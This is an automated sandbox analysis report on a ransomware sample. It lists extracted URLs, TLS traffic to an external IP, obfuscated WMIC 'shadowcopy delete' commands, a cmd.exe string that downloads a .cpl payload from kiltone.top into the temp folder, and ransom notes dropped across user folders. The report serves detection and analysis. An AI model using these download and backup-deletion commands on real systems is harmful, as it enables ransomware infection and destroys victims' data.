Source: prefs.js.27.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, loaddll32.exe, 00000000.00000002.2671467512.000000000160F000.00000004.00000020.00020000.00000000.sdmp, TD2HjoogPx.dllString found in binary or memory: https://digify.com/a/#/access/login
Source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dllString found in binary or memory: https://digify.com/a/#/access/logincmd
Source: extensions.json.27.drString found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.27.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: TD2HjoogPx.dllString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl
Source: cmd.exe, 0000000B.00000002.1578519610.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1563802595.0000000002B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://login.live.com
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://login.microsoftonline.com
Source: extensions.json.27.drString found in binary or memory: https://screenshots.firefox.com/
Source: places.sqlite.27.drString found in binary or memory: https://support.mozilla.org
Source: places.sqlite.27.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: favicons.sqlite.27.drString found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite.27.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://twitter.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://weibo.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.aliexpress.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.amazon.ca/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.amazon.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.amazon.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.amazon.de/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.amazon.fr/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.avito.ru/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.baidu.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.bbc.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.ctrip.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.ebay.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.ebay.de/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.google.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.google.com/complete/
Source: 1d0a55ec-8147-406f-a800-14c2abac24f9.27.dr, 1912e5a9-a49a-44a5-95c6-6e047a7410c8.27.dr, 975fa64d-84a3-45a6-931b-6d9e916c1153.27.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: data.safe.bin.27.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&
Source: data.safe.bin.27.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verified
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.ifeng.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.iqiyi.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.leboncoin.fr/
Source: places.sqlite.27.dr, 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.mozilla.org
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.mozilla.org/
Source: favicons.sqlite.27.drString found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite.27.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: favicons.sqlite.27.drString found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite.27.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: places.sqlite.27.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: places.sqlite.27.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.msn.com
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.olx.pl/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.reddit.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.wykop.pl/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.youtube.com/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://www.zhihu.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49707 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\local\temp\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\gigiytffyt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\grxzdkkvdb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\ipkgelntqy\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\lsbihqfdvt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\nebfqqywps\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\nvwzapqsql\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\pwccawlgre\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\qcfwyskmha\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\zggknsukop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\gigiytffyt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\grxzdkkvdb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\ipkgelntqy\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\lsbihqfdvt\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my music\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my pictures\camera roll\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my pictures\saved pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my videos\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\nebfqqywps\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\nvwzapqsql\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\pwccawlgre\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\qcfwyskmha\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\zggknsukop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\.ms-ad\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\3d objects\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\collab\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\forms\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\jscache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\crlcache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\preflight acrobat continuous\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\crashlogs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\headlights\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\linguistics\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2cc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\rttransfer\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\sonarcc\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\addins\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\credentials\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\keys\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\xlstart\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\low\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\speech\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\spelling\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\spelling\en-gb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\vault\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\accountpictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\templates\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\cachedfiles\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\extensions\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\pending pings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\bookmarkbackups\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\crashes\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\crashes\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\archived\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\archived\2023-10\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\glean\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\glean\db\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\glean\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\datareporting\glean\tmp\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\24a4ohrz.default-release\minidumps\decryptfiles.txtJump to behavior
